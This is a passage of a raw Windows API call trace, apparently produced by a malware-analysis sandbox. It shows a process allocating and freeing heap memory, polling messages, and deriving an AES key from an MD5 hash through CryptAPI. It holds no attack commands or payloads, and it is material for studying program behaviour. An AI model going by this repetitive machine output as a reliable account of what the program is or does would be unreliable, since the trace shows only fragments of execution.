(in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.380] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0168.381] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.381] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.381] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.381] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.381] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.381] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0168.381] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.381] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0168.381] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0168.382] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.382] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0168.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.382] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.382] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.383] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0168.383] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.384] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.384] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0168.384] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0168.384] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.385] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.385] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.385] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0168.385] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.385] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0168.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.386] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0168.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0168.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0168.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.390] PeekMessageW (in: 